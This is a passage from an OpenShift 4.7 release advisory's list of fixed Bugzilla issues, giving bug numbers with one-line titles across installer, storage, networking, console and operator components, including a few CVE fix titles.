[Descheduler] descheduler does not evict any pod when PodTopologySpreadConstraint strategy is set\n1904502 - vsphere-problem-detector: allow longer timeouts for some operations\n1904503 - vsphere-problem-detector: emit alerts\n1904538 - [sig-arch][Early] Managed cluster should start all core operators: monitoring: container has runAsNonRoot and image has non-numeric user (nobody)\n1904578 - metric scraping for vsphere problem detector is not configured\n1904582 - All application traffic broken due to unexpected load balancer change on 4.6.4 -\u003e 4.6.6 upgrade\n1904663 - IPI pointer customization MachineConfig always generated\n1904679 - [Feature:ImageInfo] Image info should display information about images\n1904683 - `[sig-builds][Feature:Builds] s2i build with a root user image` tests use docker.io image\n1904684 - [sig-cli] oc debug ensure it works with image streams\n1904713 - Helm charts with kubeVersion restriction are filtered incorrectly\n1904776 - Snapshot modal alert is not pluralized\n1904824 - Set vSphere hostname from guestinfo before NM starts\n1904941 - Insights status is always showing a loading icon\n1904973 - KeyError: \u0027nodeName\u0027 on NP deletion\n1904985 - Prometheus and thanos sidecar targets are down\n1904993 - Many ampersand special characters are found in strings\n1905066 - QE - Monitoring test cases - smoke test suite automation\n1905074 - QE -Gherkin linter to maintain standards\n1905100 - Too many haproxy processes in default-router pod causing high load average\n1905104 - Snapshot modal disk items missing keys\n1905115 - CI: dev-scripts fail on 02_configure_host: Failed to start network ostestbm\n1905119 - Race in AWS EBS determining whether custom CA bundle is used\n1905128 - [e2e][automation] e2e tests succeed without actually execute\n1905133 - operator conditions special-resource-operator\n1905141 - vsphere-problem-detector: report metrics through telemetry\n1905146 - Backend Tests: TestHelmRepoGetter_SkipDisabled failures\n1905194 - Detecting broken connections to the Kube API takes up to 15 minutes\n1905221 - CVO transitions from \"Initializing\" to \"Updating\" despite not attempting many manifests\n1905232 - [sig-imageregistry][Feature:ImageAppend] Image append should create images by appending them failing due to inconsistent images between CI and OCP\n1905253 - Inaccurate text at bottom of Events page\n1905298 - openshift-apiserver initContainer fix-audit-permissions is not requesting required resources: cpu, memory\n1905299 - OLM fails to update operator\n1905307 - Provisioning CR is missing from must-gather\n1905319 - cluster-samples-operator containers are not requesting required memory resource\n1905320 - csi-snapshot-webhook is not requesting required memory resource\n1905323 - dns-operator is not requesting required memory resource\n1905324 - ingress-operator is not requesting required memory resource\n1905327 - openshift-kube-scheduler initContainer wait-for-host-port is not requesting required resources: cpu, memory\n1905328 - Changing the bound token service account issuer invalids previously issued bound tokens\n1905329 - openshift-oauth-apiserver initContainer fix-audit-permissions is not requesting required resources: cpu, memory\n1905330 - openshift-monitoring init-textfile is not requesting required resources: cpu, memory\n1905338 - QE -Cypress Automation for Add Flow - Database, Yaml, OperatorBacked, PageDetails\n1905347 - QE - Design Gherkin Scenarios\n1905348 - QE - Design Gherkin Scenarios\n1905362 - [sriov] Error message \u0027Fail to update DaemonSet\u0027 always shown in sriov operator pod\n1905368 - [sriov] net-attach-def generated from sriovnetwork cannot be restored once it was deleted\n1905370 - A-Z/Z-A sorting dropdown on Developer Catalog page is not aligned with filter text input\n1905380 - Default to Red Hat/KubeVirt provider if common template does not have provider annotation\n1905393 - CMO uses rbac.authorization.k8s.io/v1beta1 instead of rbac.authorization.k8s.io/v1\n1905404 - The example of \"Remove the entrypoint on the mysql:latest image\" for `oc image append` does not work\n1905416 - Hyperlink not working from Operator Description\n1905430 - usbguard extension fails to install because of missing correct protobuf dependency version\n1905492 - The stalld service has a higher scheduler priority than ksoftirq and rcu{b, c} threads\n1905502 - Test flake - unable to get https transport for ephemeral-registry\n1905542 - [GSS] The \"External\" mode option is not available when the OCP cluster is deployed using Redhat Cluster Assisted Installer 4.6. \n1905599 - Errant change to lastupdatetime in copied CSV status can trigger runaway csv syncs\n1905610 - Fix typo in export script\n1905621 - Protractor login test fails against a 4.7 (nightly) Power cluster\n1905640 - Subscription manual approval test is flaky\n1905647 - Report physical core valid-for-subscription min/max/cumulative use to telemetry\n1905696 - ClusterMoreUpdatesModal component did not get internationalized\n1905748 - with sharded ingresscontrollers, all shards reload when any endpoint changes\n1905761 - NetworkPolicy with Egress policyType is resulting in SDN errors and improper communication within Project\n1905778 - inconsistent ingresscontroller between fresh installed cluster and upgraded cluster\n1905792 - [OVN]Cannot create egressfirewalll with dnsName\n1905889 - Should create SA for each namespace that the operator scoped\n1905920 - Quickstart exit and restart\n1905941 - Page goes to error after create catalogsource\n1905977 - QE ghaekin design scenaio-pipeline metrics ODC-3711\n1906032 - Canary Controller: Canary daemonset rolls out slowly in large clusters\n1906100 - Disconnected cluster upgrades are failing from the cli, when signature retrieval is being blackholed instead of quickly rejected\n1906105 - CBO annotates an existing Metal3 deployment resource to indicate that it is managing it\n1906118 - OCS feature detection constantly polls storageclusters and storageclasses\n1906120 - \u0027Create Role Binding\u0027 form not setting user or group value when created from a user or group resource\n1906121 - [oc] After new-project creation, the kubeconfig file does not set the project\n1906134 - OLM should not create OperatorConditions for copied CSVs\n1906143 - CBO supports log levels\n1906186 - i18n: Translators are not able to translate `this` without context for alert manager config\n1906228 - tuned and openshift-tuned sometimes do not terminate gracefully, slowing reboots\n1906274 - StorageClass installed by Cinder csi driver operator should enable the allowVolumeExpansion to support volume resize. \n1906276 - `oc image append` can\u0027t work with multi-arch image with  --filter-by-os=\u0027.*\u0027\n1906318 - use proper term for Authorized SSH Keys\n1906335 - The lastTransitionTime, message, reason field of operatorcondition should be optional\n1906356 - Unify Clone PVC boot source flow with URL/Container boot source\n1906397 - IPA has incorrect kernel command line arguments\n1906441 - HorizontalNav and NavBar have invalid keys\n1906448 - Deploy using virtualmedia with provisioning network disabled fails - \u0027Failed to connect to the agent\u0027 in ironic-conductor log\n1906459 - openstack: Quota Validation fails if unlimited quotas are given to a project\n1906496 - [BUG] Thanos having possible memory leak consuming huge amounts of node\u0027s memory and killing them\n1906508 - TestHeaderNameCaseAdjust outputs nil error message on some failures\n1906511 - Root reprovisioning tests flaking often in CI\n1906517 - Validation is not robust enough and may prevent to generate install-confing. \n1906518 - Update snapshot API CRDs to v1\n1906519 - Update LSO CRDs to use v1\n1906570 - Number of disruptions caused by reboots on a cluster cannot be measured\n1906588 - [ci][sig-builds] nodes is forbidden: User \"e2e-test-jenkins-pipeline-xfghs-user\" cannot list resource \"nodes\" in API group \"\" at the cluster scope\n1906650 - Cannot collect network policy, EgressFirewall, egressip logs with gather_network_logs\n1906655 - [SDN]Cannot colloect ovsdb-server.log and ovs-vswitchd.log with gather_network_logs\n1906679 - quick start panel styles are not loaded\n1906683 - Kn resources are not showing in Topology if triggers has KSVC and IMC as subscriber\n1906684 - Event Source creation fails if user selects no app group and switch to yaml and then to form\n1906685 - SinkBinding is shown in topology view if underlying resource along with actual source created\n1906689 - user can pin to nav configmaps and secrets multiple times\n1906691 - Add doc which describes disabling helm chart repository\n1906713 - Quick starts not accesible for a developer user\n1906718 - helm chart \"provided by Redhat\" is misspelled\n1906732 - Machine API proxy support should be tested\n1906745 - Update Helm endpoints to use Helm 3.4.x\n1906760 - performance issues with topology constantly re-rendering\n1906766 - localized `Autoscaled` \u0026 `Autoscaling` pod texts overlap with the pod ring\n1906768 - Virtualization nav item is incorrectly placed in the Admin Workloads section\n1906769 - topology fails to load with non-kubeadmin user\n1906770 - shortcuts on mobiles view occupies a lot of space\n1906798 - Dev catalog customization doesn\u0027t update console-config ConfigMap\n1906806 - Allow installing extra packages in ironic container images\n1906808 - [test-disabled] ServiceAccounts should support OIDC discovery of service account issuer\n1906835 - Topology view shows add page before then showing full project workloads\n1906840 - ClusterOperator should not have status \"Updating\" if operator version is the same as the release version\n1906844 - EndpointSlice and EndpointSliceProxying feature gates should be disabled for openshift-sdn kube-proxy\n1906860 - Bump kube dependencies to v1.20 for Net Edge components\n1906864 - Quick Starts Tour: Need to adjust vertical spacing\n1906866 - Translations of Sample-Utils\n1906871 - White screen when sort by name in monitoring alerts page\n1906872 - Pipeline Tech Preview Badge Alignment\n1906875 - Provide an option to force backup even when API is not available. \n1906877 - Placeholder\u0027 value in search filter do not match column heading in Vulnerabilities\n1906879 - Add missing i18n keys\n1906880 - oidcdiscoveryendpoint controller invalidates all TokenRequest API tokens during install\n1906896 - No Alerts causes odd empty Table (Need no content message)\n1906898 - Missing User RoleBindings in the Project Access Web UI\n1906899 - Quick Start - Highlight Bounding Box Issue\n1906916 - Teach CVO about flowcontrol.apiserver.k8s.io/v1beta1\n1906933 - Cluster Autoscaler should have improved mechanisms for group identifiers\n1906935 - Delete resources when Provisioning CR is deleted\n1906968 - Must-gather should support collecting kubernetes-nmstate resources\n1906986 - Ensure failed pod adds are retried even if the pod object doesn\u0027t change\n1907199 - Need to upgrade machine-api-operator module version under cluster-api-provider-kubevirt\n1907202 - configs.imageregistry.operator.openshift.io cluster does not update its status fields after URL change\n1907211 - beta promotion of p\u0026f switched storage version to v1beta1, making downgrades impossible. \n1907269 - Tooltips data are different when checking stack or not checking stack for the same time\n1907280 - Install tour of OCS not available. \n1907282 - Topology page breaks with white screen\n1907286 - The default mhc machine-api-termination-handler couldn\u0027t watch spot instance\n1907287 - [csi-snapshot-webhook] should support both v1beta1 and v1 version when creating volumesnapshot/volumesnapshotcontent\n1907293 - Increase timeouts in e2e tests\n1907295 - Gherkin script for improve management for helm\n1907299 - Advanced Subscription Badge for KMS and Arbiter not present\n1907303 - Align VM template list items by baseline\n1907304 - Use PF styles for selected template card in VM Wizard\n1907305 - Drop \u0027ISO\u0027 from CDROM boot source message\n1907307 - Support and provider labels should be passed on between templates and sources\n1907310 - Pin action should be renamed to favorite\n1907312 - VM Template source popover is missing info about added date\n1907313 - ClusterOperator objects cannot be overriden with cvo-overrides\n1907328 - iproute-tc package is missing in ovn-kube image\n1907329 - CLUSTER_PROFILE env. variable is not used by the CVO\n1907333 - Node stuck in degraded state, mcp reports \"Failed to remove rollback: error running rpm-ostree cleanup -r: error: Timeout was reached\"\n1907373 - Rebase to kube 1.20.0\n1907375 - Bump to latest available 1.20.x k8s - workloads team\n1907378 - Gather netnamespaces networking info\n1907380 - kube-rbac-proxy exposes tokens, has excessive verbosity\n1907381 - OLM fails to deploy an operator if its deployment template contains a description annotation that doesn\u0027t match the CSV one\n1907390 - prometheus-adapter: panic after k8s 1.20 bump\n1907399 - build log icon link on topology nodes cause app to reload\n1907407 - Buildah version not accessible\n1907421 - [4.6.1]oc-image-mirror command failed on \"error: unable to copy layer\"\n1907453 - Dev Perspective -\u003e running vm details -\u003e resources -\u003e no data\n1907454 - Install PodConnectivityCheck CRD with CNO\n1907459 - \"The Boot source is also maintained by Red Hat.\" is always shown for all boot sources\n1907475 - Unable to estimate the error rate of ingress across the connected fleet\n1907480 - `Active alerts` section throwing forbidden error for users. \n1907518 - Kamelets/Eventsource should be shown to user if they have create access\n1907543 - Korean timestamps are shown when users\u0027 language preferences are set to German-en-en-US\n1907610 - Update kubernetes deps to 1.20\n1907612 - Update kubernetes deps to 1.20\n1907621 - openshift/installer: bump cluster-api-provider-kubevirt version\n1907628 - Installer does not set primary subnet consistently\n1907632 - Operator Registry should update its kubernetes dependencies to 1.20\n1907639 - pass dual-stack node IPs to kubelet in dual-stack clusters\n1907644 - fix up handling of non-critical annotations on daemonsets/deployments\n1907660 - Pod list does not render cell height correctly when pod names are too long (dynamic table rerendering issue?)\n1907670 - CVE-2020-27846 crewjam/saml: authentication bypass in saml authentication\n1907671 - Ingress VIP assigned to two infra nodes simultaneously - keepalived process running in pods seems to fail\n1907767 - [e2e][automation]update test suite for kubevirt plugin\n1907770 - Recent RHCOS 47.83 builds (from rhcos-47.83.202012072210-0 on) don\u0027t allow master and worker nodes to boot\n1907792 - The `overrides` of the OperatorCondition cannot block the operator upgrade\n1907793 - Surface support info in VM template details\n1907812 - 4.7 to 4.6 downgrade stuck in clusteroperator storage\n1907822 - [OCP on OSP] openshift-install panic when checking quota with install-config have no flavor set\n1907863 - Quickstarts status not updating when starting the tour\n1907872 - dual stack with an ipv6 network fails on bootstrap phase\n1907874 - QE - Design Gherkin Scenarios for epic ODC-5057\n1907875 - No response when try to expand pvc with an invalid size\n1907876 - Refactoring record package to make gatherer configurable\n1907877 - QE - Automation- pipelines builder scripts\n1907883 - Fix Pipleine creation without namespace issue\n1907888 - Fix pipeline list page loader\n1907890 - Misleading and incomplete alert message shown in pipeline-parameters and pipeline-resources form\n1907892 - Unable to edit application deployed using \"From Devfile\" option\n1907893 - navSortUtils.spec.ts unit test failure\n1907896 - When a workload is added, Topology does not place the new items well\n1907908 - VM Wizard always uses VirtIO for the VM rootdisk regardless what is defined in common-template\n1907924 - Enable madvdontneed in OpenShift Images\n1907929 - Enable madvdontneed in OpenShift System Components Part 2\n1907936 - NTO is not reporting nto_profile_set_total metrics correctly after reboot\n1907947 - The kubeconfig saved in tenantcluster shouldn\u0027t include anything that is not related to the current context\n1907948 - OCM-O bump to k8s 1.20\n1907952 - bump to k8s 1.20\n1907972 - Update OCM link to open Insights tab\n1907989 - DataVolumes was intorduced in common templates - VM creation fails in the UI\n1907998 - Gather kube_pod_resource_request/limit metrics as exposed in upstream KEP 1916\n1908001 - [CVE-2020-10749] Update github.com/containernetworking/plugins to v.0.8.6 in egress-router-cni\n1908014 - e2e-aws-ansible and e2e-aws-helm are broken in ocp-release-operator-sdk\n1908035 - dynamic-demo-plugin build does not generate dist directory\n1908135 - quick search modal is not centered over topology\n1908145 - kube-scheduler-recovery-controller container crash loop when router pod is co-scheduled\n1908159 - [AWS C2S] MCO fails to sync cloud config\n1908171 - GCP: Installation fails when installing cluster with n1-custom-4-16384custom type (n1-custom-4-16384)\n1908180 - Add source for template is stucking in preparing pvc\n1908217 - CI: Server-Side Apply should work for oauth.openshift.io/v1: has no tokens\n1908231 - [Migration] The pods ovnkube-node are in  CrashLoopBackOff after SDN to OVN\n1908277 - QE - Automation- pipelines actions scripts\n1908280 - Documentation describing `ignore-volume-az` is incorrect\n1908296 - Fix pipeline builder form yaml switcher validation issue\n1908303 - [CVE-2020-28367 CVE-2020-28366] Remove CGO flag from rhel Dockerfile in Egress-Router-CNI\n1908323 - Create button missing for PLR in the search page\n1908342 - The new pv_collector_total_pv_count is not reported via telemetry\n1908344 - [vsphere-problem-detector] CheckNodeProviderID and CheckNodeDiskUUID have the same name\n1908347 - CVO overwrites ValidatingWebhookConfiguration for snapshots\n1908349 - Volume snapshot tests are failing after 1.20 rebase\n1908353 - QE - Automation- pipelines runs scripts\n1908361 - bump to k8s 1.20\n1908367 - QE - Automation- pipelines triggers scripts\n1908370 - QE - Automation- pipelines secrets scripts\n1908375 - QE - Automation- pipelines workspaces scripts\n1908381 - Go Dependency Fixes for Devfile Lib\n1908389 - Loadbalancer Sync failing on Azure\n1908400 - Tests-e2e, increase timeouts, re-add TestArchiveUploadedAndResultsReceived\n1908407 - Backport Upstream 95269 to fix potential crash in kubelet\n1908410 - Exclude Yarn from VSCode search\n1908425 - Create Role Binding form subject type and name are undefined when All Project is selected\n1908431 - When the marketplace-operator pod get\u0027s restarted, the custom catalogsources are gone, as well as the pods\n1908434 - Remove \u0026apos from metal3-plugin internationalized strings\n1908437 - Operator backed with no icon has no badge associated with the CSV tag\n1908459 - bump to k8s 1.20\n1908461 - Add bugzilla component to OWNERS file\n1908462 - RHCOS 4.6 ostree removed dhclient\n1908466 - CAPO AZ Screening/Validating\n1908467 - Zoom in and zoom out in topology package should be sentence case\n1908468 - [Azure][4.7] Installer can\u0027t properly parse instance type with non integer memory size\n1908469 - nbdb failed to come up while bringing up OVNKubernetes cluster\n1908471 - OLM should bump k8s dependencies to 1.20\n1908484 - oc adm release extract --cloud=aws --credentials-requests dumps all manifests\n1908493 - 4.7-e2e-metal-ipi-ovn-dualstack intermittent test failures, worker hostname is overwritten by NM\n1908545 - VM clone dialog does not open\n1908557 - [e2e][automation]Miss css id on bootsource and reviewcreate step on wizard\n1908562 - Pod readiness is not being observed in real world cases\n1908565 - [4.6] Cannot filter the platform/arch of the index image\n1908573 - Align the style of flavor\n1908583 - bootstrap does not run on additional networks if configured for master in install-config\n1908596 - Race condition on operator installation\n1908598 - Persistent Dashboard shows events for all provisioners\n1908641 - Go back to Catalog Page link on Virtual Machine page vanishes on empty state\n1908648 - Skip TestKernelType test on OKD, adjust TestExtensions\n1908650 - The title of customize wizard is inconsistent\n1908654 - cluster-api-provider: volumes and disks names shouldn\u0027t change by machine-api-operator\n1908675 - Reenable [sig-storage] CSI mock volume CSI FSGroupPolicy [LinuxOnly] should modify fsGroup if fsGroupPolicy=default [Suite:openshift/conformance/parallel] [Suite:k8s]\n1908687 - Option to save user settings separate when using local bridge (affects console developers only)\n1908697 - Show `kubectl diff ` command in the oc diff help page\n1908715 - Pressing the arrow up key when on topmost quick-search list item it should loop back to bottom\n1908716 - UI breaks on click of sidebar of ksvc (if revisions not up) in topology on 4.7 builds\n1908717 - \"missing unit character in duration\" error in some network dashboards\n1908746 - [Safari] Drop Shadow doesn\u0027t works as expected on hover on workload\n1908747 - stale S3 CredentialsRequest in CCO manifest\n1908758 - AWS: NLB timeout value is rejected by AWS cloud provider after 1.20 rebase\n1908830 - RHCOS 4.6 - Missing Initiatorname\n1908868 - Update empty state message for EventSources and Channels tab\n1908880 - 4.7 aws-serial CI: NoExecuteTaintManager Single Pod [Serial] eventually evict pod with finite tolerations from tainted nodes\n1908883 - CVE-2020-29652 golang: crypto/ssh: crafted authentication request can lead to nil pointer dereference\n1908888 - Dualstack does not work with multiple gateways\n1908889 - Bump CNO to k8s 1.20\n1908891 - TestDNSForwarding DNS operator e2e test is failing frequently\n1908914 - CNO: upgrade nodes before masters\n1908918 - Pipeline builder yaml view sidebar is not responsive\n1908960 - QE - Design Gherkin Scenarios\n1908971 - Gherkin Script for pipeline debt 4.7\n1908983 - i18n: Add Horizontal Pod Autoscaler action menu is not translated\n1908997 - Unsupported access mode should not be available when creating pvc by cinder-csi-driver/gcp-pd-csi-driver from web-console\n1908998 - [cinder-csi-driver] doesn\u0027t detect the credentials change\n1909004 - \"No datapoints found\" for RHEL node\u0027s filesystem graph\n1909005 - i18n: workloads list view heading is not translated\n1909012 - csi snapshot webhook does not block any invalid update for volumesnapshot and volumesnapshotcontent objects\n1909027 - Disks option of Sectected capacity chart shows HDD disk even on selection of SDD disk type\n1909043 - OCP + OCS 4.7 Internal - Storage cluster creation throws warning when zone=0 in VMware\n1909067 - Web terminal should keep latest output when connection closes\n1909070 - PLR and TR Logs component is not streaming as fast as tkn\n1909092 - Error Message should not confuse user on Channel form\n1909096 - OCP 4.7+OCS 4.7 - The Requested Cluster Capacity field needs to include the selected capacity in calculation in Review and Create Page\n1909108 - Machine API components should use 1.20 dependencies\n1909116 - Catalog Sort Items dropdown is not aligned on Firefox\n1909198 - Move Sink action option is not working\n1909207 - Accessibility Issue on monitoring page\n1909236 - Remove pinned icon overlap on resource name\n1909249 - Intermittent packet drop from pod to pod\n1909276 - Accessibility Issue on create project modal\n1909289 - oc debug of an init container no longer works\n1909290 - Logging may be broken due to mix of k8s.io/klog v1 and v2\n1909358 - registry.redhat.io/redhat/community-operator-index:latest only have hyperfoil-bundle\n1909453 - Boot disk RAID can corrupt ESP if UEFI firmware writes to it\n1909455 - Boot disk RAID will not boot if the primary disk enumerates but fails I/O\n1909464 - Build operator-registry with golang-1.15\n1909502 - NO_PROXY is not matched between bootstrap and global cluster setting which lead to desired master machineconfig is not found\n1909521 - Add kubevirt cluster type for e2e-test workflow\n1909527 - [IPI Baremetal] After upgrade from 4.6 to 4.7 metal3 pod does not get created\n1909587 - [OCP4] all of the OCP master nodes with soft-anti-affinity run on the same OSP node\n1909610 - Fix available capacity when no storage class selected\n1909678 - scale up / down buttons available on pod details side panel\n1909723 - cluster-api-provider-openstack: Update ose-openstack-machine-controllers builder \u0026 base images to be consistent with ART\n1909730 - unbound variable error if EXTRA_PKGS_LIST is not defined\n1909739 - Arbiter request data changes\n1909744 - cluster-api-provider-openstack: Bump gophercloud\n1909790 - PipelineBuilder yaml view cannot be used for editing a pipeline\n1909791 - Update standalone kube-proxy config for EndpointSlice\n1909792 - Empty states for some details page subcomponents are not i18ned\n1909815 - Perspective switcher is only half-i18ned\n1909821 - OCS 4.7 LSO installation blocked because of Error \"Invalid value: \"integer\": spec.flexibleScaling in body\n1909836 - operator-install-global Cypress test was failing in OLM as it depends on an operator that isn\u0027t installed in CI\n1909864 - promote-release-openshift-machine-os-content-e2e-aws-4.5 is perm failing\n1909911 - [OVN]EgressFirewall caused a segfault\n1909943 - Upgrade from 4.6 to 4.7 stuck due to write /sys/devices/xxxx/block/sda/queue/scheduler: invalid argument\n1909958 - Support Quick Start Highlights Properly\n1909978 - ignore-volume-az = yes not working on standard storageClass\n1909981 - Improve statement in template select step\n1909992 - Fail to pull the bundle image when using the private index image\n1910024 - Reload issue in latest(4.7) UI code on 4.6 cluster locally in dev\n1910036 - QE - Design Gherkin Scenarios ODC-4504\n1910049 - UPI: ansible-galaxy is not supported\n1910127 - [UPI on oVirt]:  Improve UPI Documentation\n1910140 - fix the api dashboard with changes in upstream kube 1.20\n1910160 - If two OperatorConditions include the same deployments they will keep updating the deployment\u0027s containers with the OPERATOR_CONDITION_NAME Environment Variable\n1910165 - DHCP to static lease script doesn\u0027t handle multiple addresses\n1910305 - [Descheduler] - The minKubeVersion should be 1.20.0\n1910409 - Notification drawer is not localized for i18n\n1910459 - Could not provision gcp volume if delete secret gcp-pd-cloud-credentials\n1910492 - KMS details are auto-populated on the screen in next attempt at Storage cluster creation\n1910501 - Installed Operators-\u003eOperand required: Clicking on cancel in Storage cluster page takes back to the Install Operator page\n1910533 - [OVN] It takes about 5 minutes for EgressIP failover to work\n1910581 - library-go: proxy ENV is not injected into csi-driver-controller which lead to storage operator never get ready\n1910666 - Creating a Source Secret from type SSH-Key should use monospace font for better usability\n1910738 - OCP 4.7 Installation fails on VMWare due to 1 worker that is degraded\n1910739 - Redfish-virtualmedia (idrac) deploy fails on \"The Virtual Media image server is already connected\"\n1910753 - Support Directory Path to Devfile\n1910805 - Missing translation for Pipeline status and breadcrumb text\n1910829 - Cannot delete a PVC if the dv\u0027s phase is WaitForFirstConsumer\n1910840 - Show Nonexistent  command info in the `oc rollback -h` help page\n1910859 - breadcrumbs doesn\u0027t use last namespace\n1910866 - Unify templates string\n1910870 - Unify template dropdown action\n1911016 - Prometheus unable to mount NFS volumes after upgrading to 4.6\n1911129 - Monitoring charts renders nothing when switching from a Deployment to \"All workloads\"\n1911176 - [MSTR-998] Wrong text shown when hovering on lines of charts in API Performance dashboard\n1911212 - [MSTR-998] API Performance Dashboard \"Period\" drop-down has a choice \"$__auto_interval_period\" which can bring \"1:154: parse error: missing unit character in duration\"\n1911213 - Wrong and misleading warning for VMs that were created manually (not from template)\n1911257 - [aws-c2s] failed to create cluster, kube-cloud-config was not created\n1911269 - waiting for the build message present when build exists\n1911280 - Builder images are not detected for Dotnet, Httpd, NGINX\n1911307 - Pod Scale-up requires extra privileges in OpenShift web-console\n1911381 - \"Select Persistent Volume Claim project\" shows in customize wizard when select a source available template\n1911382 - \"source volumeMode (Block) and target volumeMode (Filesystem) do not match\" shows in VM Error\n1911387 - Hit error - \"Cannot read property \u0027value\u0027 of undefined\" while creating VM from template\n1911408 - [e2e][automation] Add auto-clone cli tests and new flow of VM creation\n1911418 - [v2v] The target storage class name is not displayed if default storage class is used\n1911434 - git ops empty state page displays icon with watermark\n1911443 - SSH Cretifiaction field should be validated\n1911465 - IOPS display wrong unit\n1911474 - Devfile Application Group Does Not Delete Cleanly (errors)\n1911487 - Pruning Deployments should use ReplicaSets instead of ReplicationController\n1911574 - Expose volume mode  on Upload Data form\n1911617 - [CNV][UI] Failure to add source to VM template when no default storage class is defined\n1911632 - rpm-ostree command fail due to wrong options when updating ocp-4.6 to 4.7 on worker nodes with rt-kernel\n1911656 - using \u0027operator-sdk run bundle\u0027 to install operator successfully, but the command output said \u0027Failed to run bundle\u0027\u0027\n1911664 - [Negative Test] After deleting metal3 pod, scaling worker stuck on provisioning state\n1911782 - Descheduler should not evict pod used local storage by the PVC\n1911796 - uploading flow being displayed before submitting the form\n1912066 - The ansible type operator\u0027s manager container is not stable when managing the CR\n1912077 - helm operator\u0027s default rbac forbidden\n1912115 - [automation] Analyze job keep failing because of \u0027JavaScript heap out of memory\u0027\n1912237 - Rebase CSI sidecars for 4.7\n1912381 - [e2e][automation] Miss css ID on Create Network Attachment Definition page\n1912409 - Fix flow schema deployment\n1912434 - Update guided tour modal title\n1912522 - DNS Operator e2e test: TestCoreDNSImageUpgrade is fundamentally broken\n1912523 - Standalone pod status not updating in topology graph\n1912536 - Console Plugin CR for console-demo-plugin has wrong apiVersion\n1912558 - TaskRun list and detail screen doesn\u0027t show Pending status\n1912563 - p\u0026f: carry 97206: clean up executing request on panic\n1912565 - OLM macOS local build broken by moby/term dependency\n1912567 - [OCP on RHV] Node becomes to \u0027NotReady\u0027 status when shutdown vm from RHV UI only on the second deletion\n1912577 - 4.1/4.2-\u003e4.3-\u003e...-\u003e 4.7 upgrade is stuck during 4.6-\u003e4.7 with co/openshift-apiserver Degraded, co/network not Available and several other components pods CrashLoopBackOff\n1912590 - publicImageRepository not being populated\n1912640 - Go operator\u0027s controller pods is forbidden\n1912701 - Handle dual-stack configuration for NIC IP\n1912703 - multiple queries can\u0027t be plotted in the same graph under some conditons\n1912730 - Operator backed: In-context should support visual connector if SBO is not installed\n1912828 - Align High Performance VMs with High Performance in RHV-UI\n1912849 - VM from wizard - default flavor does not match the actual flavor set by common templates\n1912852 - VM from wizard - available VM templates - \"storage\" field is \"0 B\"\n1912888 - recycler template should be moved to KCM operator\n1912907 - Helm chart repository index can contain unresolvable relative URL\u0027s\n1912916 - Set external traffic policy to cluster for IBM platform\n1912922 - Explicitly specifying the operator generated default certificate for an ingress controller breaks the ingress controller\n1912938 - Update confirmation modal for quick starts\n1912942 - cluster-storage-operator: proxy ENV is not injected into vsphere-problem-detector deployment\n1912944 - cluster-storage-operator: proxy ENV is not injected into Manila CSI driver operator deployment\n1912945 - aws-ebs-csi-driver-operator: proxy ENV is not injected into the CSI driver\n1912946 - gcp-pd-csi-driver-operator: proxy ENV is not injected into the CSI driver\n1912947 - openstack-cinder-csi-driver-operator: proxy ENV is not injected into the CSI driver\n1912948 - csi-driver-manila-operator: proxy ENV is not injected into the CSI driver\n1912949 - ovirt-csi-driver-operator: proxy ENV is not injected into the CSI driver\n1912977 - rebase upstream static-provisioner\n1913006 - Remove etcd v2 specific alerts with etcd_http* metrics\n1913011 - [OVN] Pod\u0027s external traffic not use egressrouter macvlan ip as a source ip\n1913037 - update static-provisioner base image\n1913047 - baremetal clusteroperator progressing status toggles between true and false when cluster is in a steady state\n1913085 - Regression OLM uses scoped client for CRD installation\n1913096 - backport: cadvisor machine metrics are missing in k8s 1.19\n1913132 - The installation of Openshift Virtualization reports success early before it \u0027s succeeded eventually\n1913154 - Upgrading to 4.6.10 nightly failed with RHEL worker nodes: Failed to find /dev/disk/by-label/root\n1913196 - Guided Tour doesn\u0027t handle resizing of browser\n1913209 - Support modal should be shown for community supported templates\n1913226 - [Migration] The SDN migration rollback failed if customize vxlanPort\n1913249 - update info alert this template is not aditable\n1913285 - VM list empty state should link to virtualization quick starts\n1913289 - Rebase AWS EBS CSI driver for 4.7\n1913292 - OCS 4.7 Installation failed over vmware when arbiter was enabled, as flexibleScaling is also getting enabled\n1913297 - Remove restriction of taints for arbiter node\n1913306 - unnecessary scroll bar is present on quick starts panel\n1913325 - 1.20 rebase for openshift-apiserver\n1913331 - Import from git: Fails to detect Java builder\n1913332 - Pipeline visualization breaks the UI when multiple taskspecs are used\n1913343 - (release-4.7) Added changelog file for insights-operator\n1913356 - (release-4.7) Implemented gathering specific logs from openshift apiserver operator\n1913371 - Missing i18n key \"Administrator\" in namespace \"console-app\" and language \"en.\"\n1913386 - users can see metrics of namespaces for which they don\u0027t have rights when monitoring own services with prometheus user workloads\n1913420 - Time duration setting of resources is not being displayed\n1913536 - 4.6.9 -\u003e 4.7 upgrade hangs.  RHEL 7.9 worker stuck on \"error enabling unit: Failed to execute operation: File exists\\\\n\\\"\n1913554 - Recording rule for ingress error fraction SLI is incorrect, uses irate instead of increase\n1913560 - Normal user cannot load template on the new wizard\n1913563 - \"Virtual Machine\" is not on the same line in create button when logged with normal user\n1913567 - Tooltip data should be same for line chart or stacked chart, display data value same as the table\n1913568 - Normal user cannot create template\n1913582 - [Migration]SDN to OVN migration stucks on MCO for rhel worker\n1913585 - Topology descriptive text fixes\n1913608 - Table data contains data value None after change time range in graph and change back\n1913651 - Improved Red Hat image and crashlooping OpenShift pod collection\n1913660 - Change location and text of Pipeline edit flow alert\n1913685 - OS field not disabled when creating a VM from a template\n1913716 - Include additional use of existing libraries\n1913725 - Refactor Insights Operator Plugin states\n1913736 - Regression: fails to deploy computes when using root volumes\n1913747 - Update operator to kubernetes 1.20.1 to pickup upstream fixes\n1913751 - add third-party network plugin test suite to openshift-tests\n1913783 - QE-To fix the merging pr issue, commenting the afterEach() block\n1913807 - Template support badge should not be shown for community supported templates\n1913821 - Need definitive steps about uninstalling descheduler operator\n1913851 - Cluster Tasks are not sorted in pipeline builder\n1913864 - BuildConfig YAML template references ruby ImageStreamTag that no longer exists\n1913951 - Update the Devfile Sample Repo to an Official Repo Host\n1913960 - Cluster Autoscaler should use 1.20 dependencies\n1913969 - Field dependency descriptor can sometimes cause an exception\n1914060 - Disk created from \u0027Import via Registry\u0027 cannot be used as boot disk\n1914066 - [sriov] sriov dp pod crash when delete ovs HW offload policy\n1914090 - Grafana - The resulting dataset is too large to graph (OCS RBD volumes being counted as disks)\n1914119 - vsphere problem detector operator has no permission to update storages.operator.openshift.io instances\n1914125 - Still using /dev/vde as default device path when create localvolume\n1914183 - Empty NAD page is missing link to quickstarts\n1914196 - target port in `from dockerfile` flow does nothing\n1914204 - 